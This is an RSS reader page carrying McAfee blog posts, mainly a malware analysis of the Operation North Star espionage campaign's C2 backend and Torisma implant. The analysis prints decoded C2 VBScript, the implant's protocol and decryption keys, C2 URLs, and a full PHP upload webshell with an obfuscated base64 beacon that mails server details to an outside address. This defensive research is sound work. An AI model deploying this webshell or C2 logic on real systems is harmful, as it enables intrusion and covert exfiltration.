FreshRSS

🔒
❌ About FreshRSS
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

McAfee Labs Report Reveals Continuing Surge of COVID-19 Threats and Malware

By Raj Samani

The McAfee Advanced Threat Research team today published the McAfee Labs Threats Report: November 2020.

In this edition, we follow our preceding McAfee Labs COVID-19 Threats Report with more research and data designed to help you better protect your enterprise’s productivity and viability during challenging times.

What a year so far! The first quarter of 2020 included a rush of malicious actors leveraging COVID-19, and the trend only increased in the second quarter. For example, McAfee’s global network of more than a billion sensors registered a 605% increase in total Q2 COVID-19-themed threat detections. It’s an example of updated pandemic-related threats you can track on our McAfee COVID-19 Threats Dashboard.

This edition of our threat report also looks at other notable Q2 20 malware increases including:

  • Attacks on cloud services users reached nearly 7.5 million
  • New malware samples grew 11.5%, averaging 419 new threats per minute
  • PowerShell malware surged 117%

To help ensure your data and systems remain secure, we have also made available the MVISION Insights preview dashboard to demonstrate the prevalence of such current campaigns. This dashboard also provides access to the Yara rules, IoCs, and mapping of such campaigns against the MITRE ATT&CK Framework. We update these campaigns on a weekly basis so, in essence, this threat report has an accompanying dashboard with more detail on specific campaigns.

I certainly hope that you see the value not only in the data presented within the threats report, but also with the dashboards. Your feedback is important to us.

Stay safe.

 

McAfee Labs Quarterly Threat Report – November 2020

What a year so far! We exited the first quarter of 2020 battling the rush of malicious actors leveraging COVID-19, and in the second quarter there are no signs that these attacks seem to be abating.

Download Now

 

The post McAfee Labs Report Reveals Continuing Surge of COVID-19 Threats and Malware appeared first on McAfee Blogs.

Operation North Star: Summary Of Our Latest Analysis

By Christiaan Beek

McAfee’s Advanced Threat Research (ATR) today released research that uncovers previously undiscovered information on how Operation North Star evaluated its prospective victims and launched attacks on organizations in Australia, India, Israel and Russia, including defense contractors based in India and Russia.

McAfee’s initial research into Operation North Star revealed a campaign that used social media sites, spearphishing and weaponized documents to target employees working for organizations in the defense sector. This early analysis focused on the adversary’s initial intrusion vectors, the first stages of how an implant was installed, and how it interacted with the Command and Control (C2) server.

By deepening its investigation into the inner workings of North Star’s C2, McAfee ATR can now provide a unique view into not only the technology and tactics the adversary used to stealthily execute his attacks but also the kinds of victims he targeted.

The latest research probed into the campaign’s backend infrastructure to establish greater perspective into how the adversary targeted and assessed his victims for continued exploitation, and how he used a previously unknown implant called Torisma to execute this exploitation.

McAfee’s findings ultimately provide a unique view into a persistent cyber espionage campaign targeting high value individuals in possession of high value defense sector intellectual property and other confidential information.

VECTORS & INFRASTRUCTURE

Most analysis of cyber campaigns is typically reliant upon the dissection of malware and the telemetry of cyber defenses that have come into contact with those campaigns. McAfee’s analysis of Operation North Star complemented these elements by dissecting the C2 infrastructure that operated the campaign. In doing so, we gained a holistic view of its operations that is rarely available to threat researchers.

Attackers often send out many spearphishing emails to many potential targets rather than precisely targeting the highest value individuals. Once the victim opens a message and infects himself, the malware will try to fully exploit his system. But this broad, less precise approach of infecting many is “noisy” in that it is likely to be identified if these infections are happening at scale across an organization (let alone around the world).  Cyber defenses will eventually be able to recognize and stop it.

In the case of Operation North Star, the attackers researched their specific target victims, developed customized content to lure them, engaged them directly via LinkedIn mail conversations, and sent them sophisticated attachments that infected them in a novel way using a template injection tactic.

The campaign used legitimate job recruitment content from popular U.S. defense contractor websites to lure specific victims into opening malicious spear phishing email attachments. Notably, the attackers compromised and used legitimate web domains hosted in the U.S. and Italy to host their command and control capabilities. These otherwise benign domains belonged to organizations in a wide variety of fields, from an apparel manufacturer, to an auction house, to a printing company, to an IT training firm.

Using these domains to conduct C2 operations likely allowed them to bypass some organizations’ security measures because most organizations do not block trusted websites.

The first stage implant was delivered by DOTM files which, once established on a victim’s system, gathered information on that system such as disk information, free disk space information, computer name and logged in username and process information. It would then use a set of logic to evaluate the victim system data sent back by this initial implant to determine whether to install a second-stage implant called Torisma. All the while, it operated to achieve its objectives while minimizing the risk of detection and discovery.

General process flow and component relationship

Torisma is a previously undiscovered, custom-developed, second-stage implant focused on specialized monitoring of high value victims’ systems. Once installed, it would execute custom shellcode and run a custom set of actions depending on the victim systems’ profiles. The actions included active monitoring of the systems and execution of payloads based on observed events. For instance, it would monitor for an increase in the number of logical drives and Remote Desktop Sessions (RDS).

What is clear is that the campaign’s objective was to establish a long-term, persistent espionage campaign focused on specific individuals in possession of strategically valuable technology from key countries around the world.

VICTIMS & IMPACT

McAfee’s early analysis of Operation North Star’s spearphishing messages were written in Korean and exhibited mentions of topics specific to South Korean politics and diplomacy. But our latest analysis of North Star’s C2 log files enabled us to identify targets beyond South Korea:

 

  • Two IP addresses in two Israeli ISP address spaces
  • IP addresses in Australian ISP space
  • IP address in Russian ISP address space
  • India-based defense contractor
  • Russian defense contractor

The campaign’s technologies and tactics—the installation of data gathering and system monitoring implants—suggests that the adversary is in a position to remain persistent, conduct surveillance on and exfiltrate sensitive data from its defense sector victims.

The detailed job descriptions used to lure victims and the selective use of the Torisma implant suggest that the attackers were pursuing very specific intellectual property and other confidential information from very specific defense technology providers. Less valuable victims were sidelined to be monitored silently over an extended period of time until they become more valuable.

VILLAINS & IMPLICATIONS

McAfee cannot independently attribute Operation North Star to a particular hacking group. McAfee has established that the code used in the spearphishing attachments is almost identical to that used by a 2019 Hidden Cobra campaign targeting Indian defense and aerospace companies. This could indicate that either Hidden Cobra is behind Operation North Star or another group is copying the group’s known and established technology and tactics. But sound, accurate attribution requires that technical analysis of such attacks be complemented by information from traditional intelligence sources available only to government agencies.

McAfee’s findings do suggest that the actors behind the campaign were more sophisticated than they initially appeared in our early analysis. They were focused and deliberate in what they meant to achieve and more disciplined and patient in their execution to avoid detection.

Please see our full report entitled “Operation North Star: Behind the Scenes” for a detailed review of ATR’s analysis of the campaign.

Also, please read our McAfee Defender’s blog to learn more about how you can build an adaptable security architecture against the Operation North Star campaign and others like it.

 

The post Operation North Star: Summary Of Our Latest Analysis appeared first on McAfee Blogs.

Operation North Star: Behind The Scenes

By Christiaan Beek

Executive Summary

It is rare to be provided an inside view on how major cyber espionage campaigns are conducted within the digital realm. The only transparency afforded is a limited view of victims, a malware sample, and perhaps the IP addresses of historical command and control (C2) infrastructure.

The Operation North Star campaign we detailed earlier this year provided just this. This campaign used social media sites, spearphishing and weaponized documents to target employees working for organizations in the defense sector. This early analysis focused on the adversary’s initial intrusion vectors, described the first stages of how an implant was installed, and how it interacted with the Command and Control (C2) server.

However, that initial disclosure left gaps such as the existence of secondary payload, and additional insights into how the threat actors carried out their operations and who they targeted. The updated report takes a unique deep dive following our identification of previously undiscovered information into the backend infrastructure run by the adversaries.

These findings reveal a previously undiscovered secondary implant known as Torisma. However, more telling are the operational security measures that were undertaken to remain hidden on compromised systems. In particular, we saw the application of an Allow and Block list of victims to ensure the attacker’s secondary payload did not make its way to organizations that were not targeted. This tells us that certainly there has been a degree of technical innovation exhibited not only with the use of a template injection but also in the operations run by the adversary.

Finally, while we cannot confirm the extent of the success of the adversary’s attacks, our analysis of their C2 log files indicate that they launched attacks on IP-addresses belonging to internet service providers (ISPs) in Australia, Israel and Russia, and defense contractors based in Russia and India.

The findings within this report are intended to provide you, the reader, unique insights into the technology and tactics the adversary used to target and compromise systems across the globe.

Compromised Site

Operation North Star C2 infrastructure consisted of compromised domains in Italy and other countries. Compromised domains belonged, for example, to an apparel company, an auction house and printing company. These URLs hosted malicious DOTM files, including a malicious ASP page.

  • hxxp://fabianiarte.com:443/uploads/docs/bae_defqa_logo.jpg
  • hxxps://fabianiarte.com/uploads/imgproject/912EC803B2CE49E4A541068D495AB570.jpg
  • https://www.fabianiarte.com/include/action/inc-controller-news.asp

The domain fabianiarte.com (fabianiarte.it) was compromised to host backend server code and malicious DOTM files. This domain hosted DOTM files that were used to mimic defense contractors’ job profiles as observed in Operation North Star, but the domain also included some rudimentary backend server code that we suspect was used by the implant. Log files and copies appeared in the wild pertaining to the intrusion of this domain and provided further insight. According to our analysis of this cache of data this site was compromised to host code on 7/9/2020.

Two DOTM files were discovered in this cache of logs and other intrusion data. These DOTM files belong to campaigns 510 and 511 based on the hard-coded value in the malicious VB scripts.

  • 22it-34165.jpg
  • 21it-23792.jpg

Developments in Anti-Analysis Techniques

During our analysis we uncovered two DOTM files as part of the cache of data pertaining to the backend. In analyzing first stage implants associated with the C2 server over a period of seven months, we found that there were further attempts by the adversary to obfuscate and confuse analysts.

Having appeared in July, these DOTM files contained first stage implants embedded in the same location as we documented in our initial research.  However, previous implants from other malicious DOTM files were double base64 encoded and the implants themselves were not further obfuscated. However, there were some notable changes in the method that differed from those detailed in our initial research:

  • The first stage implant that is nested in the DOTM file, is using triple base64 encoding in the Visual Basic Macro
  • The extracted DLL (desktop.dat) is packed with the Themida packer attempting to make analysis more difficult.

The first stage implant extracted from the DOTM files contains an encrypted configuration file and an intermediate dropper DLL. The configuration file, once decrypted, contains information for the first stage implant. The information includes the URL for the C2 and the decryption keys for the second stage payload called “Torisma”.

Contents of decrypted configuration

Because the configuration file contains information on how to communicate with the C2, it also stores the parameter options (ned, gl, hl). In this case, we see an unknown fourth parameter known as nl, however it does not appear to be implemented in the server-side ASP code. It is possible that the adversary may have intended to implement it in the future.

Appearance of nl parameter

In addition, analysis of the backend components for this compromised server enables us to draw a timeline of activity on how long the attacker had access. For example, the DOTM files mentioned above were placed on the compromised C2 server in July 2020. Some of the main malicious components involved in the backend operation were installed on this server in January 2020, indicating that this C2 server had been running for seven months.

Digging into the Heart of Operation North Star – Backend

Inc-Controller-News.ASP

As we covered in our initial Operation North Star research, the overall attack contained a first stage implant delivered by the DOTM files. That research found specific parameters used by the implant and that were sent to the C2 server.

Further analysis of the implant “wsdts.db” in our case, revealed that it gathers information of the victim’s system. For example:

  • Get system disks information
  • Get Free disk space information
  • Get Computer name and (logged in) Username
  • Process information

When this information is gathered, they will be communicated towards the C2 server using the parameters (ned, gl, hl).

These parameters are interpreted by an obfuscated server-side ASP page, based on the values sent will depend on the actions taken upon the victim. The server-side ASP page was placed on the compromised server January 2020.

Additionally, based on this information the adversary is targeting Windows servers running IIS to install C2 components.

The server-side ASP page contains a highly obfuscated VBScript embedded that, once decoded, reveals code designed to interact with the first stage implant. The ASP page is encoded with the VBScript.Encode method resulting in obfuscated VBScript code. The first stage implant interacts with the server-side ASP page through the usage of these finite parameters.

Encoded VBScript

Once the VBScript has been decoded it reveals a rather complex set of functions. These functions lead to installing additional stage implants on the victim’s system. These implants are known as Torisma and Doris, both of which are base64 encoded. They are loaded directly into memory via a binary stream once conditions have been satisfied based on the logic contained within the script.

Decoded VBScript

The ASP server-side script contains code to create a binary stream to where we suspect the Torisma implant is written. We also discovered that the Torisma implant is embedded in the ASP page and decoding the base64 blob reveals an AES encrypted payload. This ASP page contains evidence that indicates the existence of logic that decodes this implant and deliver it to the victim.

function getbinary(sdata)

const adtypetext = 2

const adtypebinary = 1

dim binarystream

dim aa

aa = “adodb.stream”

set binarystream = createobject(aa)

binarystream.type = adtypetext

binarystream.charset = “unicode”

binarystream.open

binarystream.writetext sdata

binarystream.position = 0

binarystream.type = adtypebinary

binarystream.position = 2

getbinary = binarystream.read

end function

Depending on the values sent, additional actions are performed on the targeted victim. Further analysis of the server-side script indicates that there is logic that depends on some mechanism for the actor to place a victim’s IP address in an allowed-list file. The second stage implant is not delivered to a victim unless this condition is met first. This alludes to the possibility that the actor is reviewing data on the backend and selecting victims, this is likely performed through another ASP page discovered (template-letter.asp).

The server-side ASP page contains code to interpret the data sent via the following parameters to execute additional code. The values to these parameters are sent by the first stage implant initially delivered by the DOTM files. These parameters were covered in our initial research, however having access to the C2 backend code reveals additional information about their true purpose.

Parameter Description
NED Campaign code embedded in DOTM Macro
GL System Information
HL Flag to indicate OS architecture (32 or 64 bits)

The URL query string is sent to the C2 server in the following format.

http://hostname/inc-controller-news.asp?ned=campaigncode&gl=base64encodeddata&hl=0

Further, code exists to get the infected victim’s IP address; this information is used to check if the IP address is allowed (get the second stage) or if the IP address has been blocked (prevent second stage). As mentioned previously, the addition of the victim’s IP address into the fake MP3 files is likely performed manually through identification of incoming connections through the stage 1 implant.

function getstripaddress()

on error resume next

dim ip

ip = request.servervariables(“http_client_ip”)

if ip = “”

then ip = request.servervariables(“http_x_forwarded_for”)

if ip = “”

then ip = request.servervariables(“remote_addr”)

end if end

if

getstripaddress = ip

end function

The full code of the logic gets the IP address for the connecting client machine and writing victim entries to a log file. In breaking down this code we can see different functionality is used that is most interesting. These log files are also stored within the WWW root of the compromised server based on the variable strlogpath.

From the below code-snippet of the vbscript, we can see that the “gl” and “hl” parameters are used to query the system information from the victim (gl) and the OS architecture (32 or 64 bits):

strinfo=replace(request.form(“gl “),””,” + “):strosbit=replace(request.form(“hl “),””,” + “)

Victim Logging

The adversary keeps track of victims through logging functionality that is implemented into the server-side ASP code. Furthermore, as described above, the backend server code has the ability to perform victim logging based on first stage implant connections. This log file is stored in the WWW root directory on the compromised C2 server. The following code snippet will write data to a log file in the format [date, IP Address, User Agent, Campaign Code (NED), System Info (GL), OS Architecture (HL)].

strlog = date() & “” & formatdatetime(now(), 4)

r = writeline(strlogpath, strlog)

r = writeline(strlogpath, stripaddr)

r = writeline(strlogpath, strua)

r = writeline(strlogpath, strcondition)

r = writeline(strlogpath, strinfo)

r = writeline(strlogpath, strosbit)

The server-side ASP code will check whether the IP address is part of an allow-list or block-list by checking for the presence of the IP in two server-side files masquerading as MP3 files. The IP address is stored in the format of an MD5 hash, contained within the server-side code as a function to create a MD5 hash. The code is looking for these files in the WWW root of the compromised server based on the variable strWorkDir.

Using an ‘allow-list’ is a possible indication that it contained the list of their pre-determined targets.

strWorkDir = “C:\”:strLogPath=strWorKdir&”lole3D_48_02_05.mp3″:StrWhiteFile=strWorkDir&”wole3D_48_02_05.mp3 “:strBlAcKFile=strWorkDir&”bole3D_48_02_05.mp3”:stripAddr=GeTStrIpAddress():strMD5IpAddr=MD5(strIpAddr):strUA=Request.serveRVariables(“HTTP_USER_AGENT “)

IP allow-list / blocklist checking

For MD5 hash generation, the system appears to be using a non-standard form of hashing for the IP addresses. In most cases, the built in Microsoft cryptographic service provider would be used to generate an MD5. In this case, however, the actor chose to use a custom method instead.

The IP address is retrieved and hashed using this method.

stripaddr=getstripaddress()

strmd5ipaddr=md5(stripaddr)

The following function (ipopk) is set to read from a file that stores hashed IPs and will be used later in a conditional block statement. The code below will open and read a file, if there is no data the flag for ipok will result in 0, if there is data then the resulting value will be 1.

function ipok(hashfile, stripaddr)

on error resume next

dim fso, fs, linedata

set fso = server.createobject(“scripting.filesystemobject”)

set fs = fso.opentextfile(hashfile, 1, true)

ipok = 0

do until fs.atendofstream

linedata = lcase(fs.readline)

if len(linedata) > 0 and instr(stripaddr, linedata) then ipok = 1

exit do

end if loop

fs.close

set fs = nothing

end function

The following code is the logic to determine if an infected victim should receive the Torisma implant. A series of cases are used to make the decision depending on specific conditions as depicted in the code. Below the cases are explained:

  • If the victim’s IP-address is on the allow-list, and the OS architecture bit value is “1” (resembling 64 bits), the Torisma 64 bits version implant will be sent to the victim and in the log file the term “case_1_64” is written behind the victim, meaning 64 bit version of the Torisma implant sent.
  • Same for the second case but now for a 32-bit version OS (value 0) and the term “case_1_86” is written, meaning 32-bit implant version of torisma sent.
  • If the ip-address of the victim is on the block list with either 32/64 bit OS architecture, a non-sense payload called “doris_x86” “doris_x64” will be sent to the victim. For example, in our case this was the value for “doris_x86”: DoriS_x86=”ddddddd”
  • If condition “24” is returned from the victim, a log entry is written with value “case_3” and no implant sent and an http response status of 405 is sent
  • If neither of the above conditions are met, “case_4” is written in the log-file, no implant sent and again an http response status of 405 is sent.

An http 405 response code indicates that the request method is known by the server but is not supported by the target resource.

if ipok(strwhitefile, strmd5ipaddr) = 1 and instr(strosbit, “1 “) > 0 then r = writeline(strlogpath, “case_1_64 “) strresdata = strbase64_torisma_x64

 

else if ipok(strwhitefile, strmd5ipaddr) = 1 and instr(strosbit, “0 “) > 0 then r = writeline(strlogpath, “case_1_86 “) strresdata = strbase64_torisma_x86

 

else if ipok(strblackfile, strmd5ipaddr) = 1 and instr(strosbit, “1 “) > 0 then r = writeline(strlogpath, “case_2_64 “) strresdata = strbase64_doris_x64

 

else if ipok(strblackfile, strmd5ipaddr) = 1 and instr(strosbit, “0 “) > 0 then r = writeline(strlogpath, “case_2_86 “) strresdata = strbase64_doris_x86

 

else if instr(strcondition, “24 “) > 0 then r = writeline(strlogpath, “case_3 “) response.status = “405”

else r = writeline(strlogpath, “case_4 “) response.status = “405 “end

Logic to deliver 2nd stage implant to victim

Inside the Torisma Implant

One of the primary objectives of Operation North Star from what we can tell is to install the Torisma implant on the targeted victim’s system based on a set of logic. Further, the end goal is executing custom shellcode post Torisma infection, thus running custom actions depending on the specific victim profiles. As described earlier, Torisma is delivered based on data sent from the victim to the command and control server. This process relies on the first stage implant extracted from VB macro embedded in the DOTM file.

General process flow and component relationship

Further, Torisma is a previously unknown 2nd stage implant embedded in the server-side ASP page as a base64 encoded blob. Embedded is a 64 and 32-bit version and depending on the OS architecture flag value sent by the victim and will determine what version is sent. Further this implant is loaded directly into memory as a result of interaction between the victim and the command and control server. The adversary went to great lengths to obfuscate, encrypt and pack the 1st and 2nd stage implants involved in this specific case.

Once Torisma is decoded from Base64 the implant is further encrypted using an AES key and compressed. The server-side ASP page does not contain any logic to decrypt the Torisma implant itself, rather it relies on decryption logic contained within the first stage implant. The decryption key exists in an encrypted configuration file, along with the URL for the command and control server.

This makes recovery of the implant more difficult if the compromised server code were to be recovered by incident responders.

The decryption method is performed by the first stage implant using the decryption key stored in the configuration file, this key is a static32-bit AES key. Torisma can be decoded with a decryption key 78b81b8215f40706527ca830c34b23f7.

Further, after decrypting the Torisma binary, it is found to also be packed with lz4 compression giving it another layer of protection. Once decompressing the code, we are now able to analyze Torisma and its capabilities giving further insight into Operation North Star and the 2nd stage implant.

The variant of the implant we analyzed was created 7/2/2020; however, given that inc-controller-news.asp was placed on the C2 in early 2020, it indicates the possibility of multiple updates.

Based on the analysis, Torisma is sending and receiving information with the following URLs.

  • hxxps://www.fabianiarte.com/newsletter/arte/view.asp
  • hxxps://www.commodore.com.tr/mobiquo/appExtt/notdefteri/writenote.php
  • hxxp://scimpex.com:443/admin/assets/backup/requisition/requisition.php

Encrypted Configuration File

Torisma also uses encrypted configuration files just as with the 1st stage implant to indicate what URLs it communicates with as a command and control, etc.

Decrypted configuration file

The configuration file for Torisma is encrypted using the algorithm VEST[1] in addition to the communication sent over the C2 channel. From our research this encryption method is not commonly used anywhere, in fact it was a proposed cipher that did not become a standard to be implemented in general technologies[2].

Further, the FOUND002.CHK file recovered from the backend is used to update the configuration and contains just URLs with .php extension. These URLs have pages with a .php extension, indicating that some of the backend may have been written in PHP. It’s unclear what the role of the servers with .PHP pages have in the overall attack. Though we can confirm based on strings and functions in Torisma that there is code designed to send and receive files with the page view.asp. This view.asp page is the Torisma implant backend from what our analysis shows here. Later in this analysis we cover more on view.asp, however that page contained basic functionality to handle requests, send and receive data with an infected victim that has the Torisma implant.

Main Functionality

According to our analysis, the Torisma code is a custom developed implant focused on specialized monitoring.

The role of Torisma is to monitor for new drives added to the system as well as remote desktop connections. This appears to be a more specialized implant focused on active monitoring on a victim’s system and triggering the execution of payloads based on monitored events. The end objective of Torisma is executing shellcode on the victim’s system and sending the results back to the C2.

The Torisma code begins by running a monitoring loop for information gathering.

Information gathering loop

General Process

It runs the monitoring routine but will first check if monitoring is enabled based on the configuration (disabled by default). The general logic of this process is as follows:

  1. If monitoring is disabled, just return
  2. Else call the code that does the monitoring and upon completion temporarily disable monitoring
  3. When run, the monitoring will be executed for a specified amount of time based on a configuration value
  4. Upon return of the monitoring function, the code will proceed to command and control communication
  5. If there is repeated failure in communication, the implant will force monitoring for 1hr and then retry the communication
  6. Repeat forever

Triggering monitoring based on configuration

Monitoring

The monitoring loop will retrieve the address of WTSEnumerateSessionsW and the local mac address using GetAdaptersInfo.

  1. The code will execute on a loop, until either enough time has elapsed (end time passed a parameter) or an event of interest occurred

 

Monitoring loop

  1. It will monitor for an increase in the number of logical drives and Remote Desktop Sessions (RDS). If either occur, a status code will be set (5. New drive, 6. New RDS session) and the monitoring loop stops.

Drive tracking

a. It uses GetlogicalDrives to get a bitmask of all the drives available on the system, then iterates over each possible drive letter

b. It will also use GetDriveType to make sure the new drive is not a CD-ROM drive

Check drive type

  1. It keeps track of the number of drives previously seen and will return 1 if the number has increased

RDP Session Tracking

The RDP session tracking function operates the same as the drive tracking. If the number increases by one it then returns 1. It uses WTSEnumerateSessionsW to get a list of sessions, iterates through them to count active ones.

Get active RDP sessions

Get active RDP sessions, continued

Command and Control Communication

The C2 code is interesting and is a custom implementation. The general process for this protocol is as follows.

  1. Generates a connection ID that will be kept throughout this step as a hex string of five random bytes for each module (0x63) and random seeded with the output of GetTickCount64

Generate connection ID

  1. Next it loads a destination URL
      a. There are three available servers hardcoded in the implant as an encrypted blob
    1. b. The decryption is done using a VEST-32 encryption algorithm with the hardcoded key ff7172d9c888b7a88a7d77372112d772

Configuration Decryption

c. A random configuration number is picked (mod 6) to select this configuration

d. There are only 3 configurations available, if the configuration number picked is above 3, it will keep incrementing (mod 6) until one is picked. Configuration 0 is more likely to be chosen because of this process.

Code to pick configurations

  1. It will send a POST request to the URL it retrieved from the configuration with a “VIEW” action. It builds a request using the following hardcoded format string.
post => ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d

=> PAGE=drive_count

CODE=RDS_session_count

CACHE=base64(blob)

Request=Rand()

 

blob: size 0x43c

blob[0x434:0x438] = status_code

blob[0x438:0x43c] = 1

blob[0:0x400] = form_url

blob[0x400:0x418] = mac_address

blob[0x418:0x424] = connection_id (random)

blob[0x424:0x434] = “MC0921” (UTF-16LE)

a. The process will be looking for the return of the string Your request has been accepted. ClientID: {f9102bc8a7d81ef01ba} to indicate success

  1. If successful, it will retrieve data from the C2 via a POST request, this time it will use the PREVPAGE action

a. It uses the following format string for the POST request

ACTION=PREVPAGE&CODE=C%s&RES=%d

With: CODE = connection_id (from before)

RES = Rand()

b. The reply received from the server is encrypted it. To decrypt it the following process is needed

i. Replace space with +

ii. Base64 decode the result

iii. Decrypt the data with key “ff7172d9c888b7a88a7d77372112d772”

Server decryption using key

iv. Perform a XOR on the data

Perform XOR on the data

    1. The decrypted data is going to be used to execute a shellcode from the server and send data back

a. Data from the server will be split into a payload to execute and the data passed as an argument that is being passed to it
b. Part of the data blob sent from the server is used to update the local configuration used for monitoring

i. The first 8 bytes are fed to a add+xor loop to generate a transformed version that s compared to hardcoded values

Configuration check

Configuration check continued

ii. If the transformed data matched either of the two hardcoded values, the local configuration is updated

iii. In addition, the duration of the observation (for the Drive/RDS) loop can be updated by the server

iv. If the duration is above 0x7620 (21 days) it will then re-enable the monitoring even if the configuration detailed above had disabled it

v. If the transformed data doesn’t match any of the two hardcoded values, then monitoring will be disabled by the configuration

c. The implant will create a new communication thread and will wait until its notified to continue. It will then proceed to execute the shellcode and then wait for the other thread to terminate.

d. Depending on what occurred (an error occurred, or monitoring is enabled/disabled) the code will return a magic value that will decide if the code needs to run again or return to the monitoring process.

Return to communications loop

    1. The communications thread will create a new named pipe (intended to communicate with the shellcode). It the notifies the other thread once the pipe is ready and then proceed to send data read from the pipe to the server.

a. The pipe name is \\.\pipe\fb4d1181bb09b484d058768598b

Code for named pipe

b. It will read data from the pipe (and flag the processing as completed if it finds “- – – – – – – – -“

c. It will then send the data read back to the C2 by sending a POST in the following format

ACTION=NEXTPAGE

ACTION=NEXTPAGE&CODE=S%s&CACHE=%s&RES=%d

CODE=connection_id

CACHE=base64(message)

RES = Rand()

d. Data is encrypted following the same pattern as before, data is first XORED and then encrypted using VEST-32 with the same key as before

e. This will be repeated until the payload thread sends the “- – – – – – – – -“message or that the post failed

Campaign Identification

One way the adversary keeps track of what victims are infected by what version of the first stage implant is by using campaign IDs. These IDs are hard coded into the VB macro of the template document files that are retrieved by the first stage maldoc.

They are sent to the backend server through the NED parameter as covered earlier, further they are read and interpreted by the ASP code.

Victimology

According to the raw access logs for Inc-Controller-News.asp it is possible to understand what countries were impacted and it matches with the logs we discovered along another .asp page (view.asp), which we will explain later in the document.

Based on one of C2 log files we could identify the following about the victims:

  • Russian defense contractor
  • Two IP addresses in two Israeli ISP address spaces
  • IP addresses in Australian ISP space
  • IP address in Russian ISP address space
  • India-based defense contractor

Template-letter.asp

During our investigation we uncovered additional information that led to the discovery of additional ASP pages. One ASP page discovered on the same compromised command and control server contained interesting code. First this ASP page is encoded in the same method using VB.Encode as we observed with the code that delivers the Torisma implant. Second it appears that the code is part of the core backend managed by the attacker and had the original file name of board_list.asp. Based on in the wild submission data the file board_list.asp first appeared in Korea October 2017, this suggests that this code for this webshell has been in use since 2017.

Further, this ASP page is a custom webshell that according to our knowledge and sources is not an off-the-shelf common webshell, rather something specifically used in these attacks. Some of the actions include browsing files, executing commands, connecting to a database, etc. The attacker is presented with the login page and a default base64 encoded password of ‘venus’ can be used to login (this value is hardcoded in the source of this page).

Template-Letter.ASP main page

Functionality to execute commands

 VIEW.ASP -Torisma Backend

The View.ASP file is equally important as the inc-controller-news.asp file and contains interesting functionality. This ASP page is the backend code for the Torisma implant, and the functions are intended to interact with the infected victim.

The view.asp file contains the following references in the code:

The file “FOUND001.CHK” contains a “logfile” as the CONST value name possibly refers to “logvault”.

Analyzing the possible victims revealed an interesting list:

  • Russia-based defense contractor
  • Two IP addresses in two Israeli ISP address spaces
  • IP address in Russian ISP address space
  • India-based defense contractor

The file “FOUND002.CHK” contains a Base64 string that decodes to:

hxxps://www.krnetworkcloud.org/blog/js/view.php|www.krnetworkcloud.org|2|/blog/js/view.php|NT

The above domain was likely compromised to host malicious code, given it belongs to an Indian IT training company.

The Const value name for “FOUND002.CHK” is “cfgvault”, the first three letters might refer to “configuration”. This ASP code contains additional functions that may indicate what role this page has in the overall scheme of things. View.asp is the Torisma implant backend code with numerous functions implemented to handle requests from the implant as described earlier in this analysis. Based on our analysis of both the Torisma implant and this backend code, some interesting insight has been discovered.  First implemented in the ASP code are the general actions that can be taken by this backend depending on the interaction with Torisma.

Some of these actions are triggered by the implant connecting and the others may be invoked by another process. The main ASP page is implemented to handle incoming requests based on a request ACTION with several possible options to call. Given that the implant is driven by the “ACTION” method when it comes to the C2 communication, a number of these cases could be selected. However, we only see code implemented in Torisma to call and handle the request/response mechanism for NEXTPAGE and PREVPAGE, thus these other actions are likely performed by the adversary through some other process.

General actions by View.ASP

ViewPrevPage

As described in the analysis, the ViewPrevPage action is a function designed to handle incoming requests from Torisma to get data. The data sent to Torisma appears to be in the form of ~dmf files. This content for the ViewPrevPage action comes in the form of shellcode intended to be executed on the victim side according to the analysis of the implant itself.

ViewPrevPage function

ViewNextPage

Torisma uses this method to send data back to the C2 server read from the named pipe. This is the results of the execution of the shellcode on the victim’s system through the ViewPrevPage action and the results of this execution are sent and processed using this function.

Implant sends data to C2

ViewGallery

There is no function in Torisma implemented to call this function directly, this is likely called from another administration tool, probably implemented in the upstream server. A static analysis of this method reveals that it is likely intended to retrieve log files in a base64 encoded format and write the response. Like the Torisma implant, there is a response string that is received by the calling component that indicates the log file had been retrieved successfully and that it should then delete the log file.

Retrieve and write log file content in base64 format (ViewGallery)

ViewMons

Another function also not used by Torisma is intended to set the local configuration file. It appears to use a different request method than ACTION; in this case it uses MAILTO. Based on insight gathered from Torisma, we can speculate this is related to configuration files that are used by the implant.

ViewMons function

SendData

This function is used in the RedirectToAdmin method exclusively and is the mechanism for sending data to the upstream C2. It depends on the GetConfig function that is based on the stored value in the cfgvault variable.

Send Data

RedirectToAdmin

This function is used to redirect information from an infected victim to the master server upstream. This is an interesting function indicating additional infrastructure beyond the immediate C2 with which we observed Torisma communicating.

RedirectToAdmin

WriteAgentLog

As part of the process of tracking victim’s with Torisma, the ASP code has a function to write log files. These resulting log files indicate success for the execution of shellcode on victims running Torisma. This logging method captures the user agent and IP address associated with the victim being monitored. This function is called when the information is sent to the master server via the RedirectToAdmin method.

Analysis of the server logs indicates the following countries made connections to the View.ASP page in July 2020.

  • India
  • Australia
  • Israel
  • Finland

Webshells

During our analysis we were able to determine that in some instances the attacker used webshells to maintain access. Discovered on another compromised server by the same actor with the same type of code was a PHP Webshell known as Viper 1337 Uploader. Based on our analysis this is a modified variant of Viper 1337 Uploader.

<title>Viper 1337 Uploader</title>

<?php

echo ‘<form action=”” method=”post” enctype=”multipart/form-data” name=”uploader” id=”uploader”>’;

echo ‘<input type=”file” name=”file” size=”50″><input name=”_upl” type=”submit” id=”_upl” value=”Upload”></form>’;

if( $_POST[‘_upl’] == “Upload” ) {

if(@copy($_FILES[‘file’][‘tmp_name’], $_FILES[‘file’][‘name’])) { echo ‘<b>Shell Uploaded ! :)<b><br><br>’; }

else { echo ‘<b>Not uploaded ! </b><br><br>’; }

}

?>

<?php

eval(base64_decode(‘JHR1anVhbm1haWwgPSAnS2VsdWFyZ2FIbWVpN0B5YW5kZXguY29tJzsKJHhfcGF0aCA9ICJodHRwOi8vIiAuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CiRwZXNhbl9hbGVydCA9ICJmaXggJHhfcGF0aCA6cCAqSVAgQWRkcmVzcyA6IFsgIiAuICRfU0VSVkVSWydSRU1PVEVfQUREUiddIC4gIiBdIjsKbWFpbCgkdHVqdWFubWFpbCwgIkNvbnRhY3QgTWUiLCAkcGVzYW5fYWxlcnQsICJbICIgLiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXSAuICIgXSIpOw==’));

?>

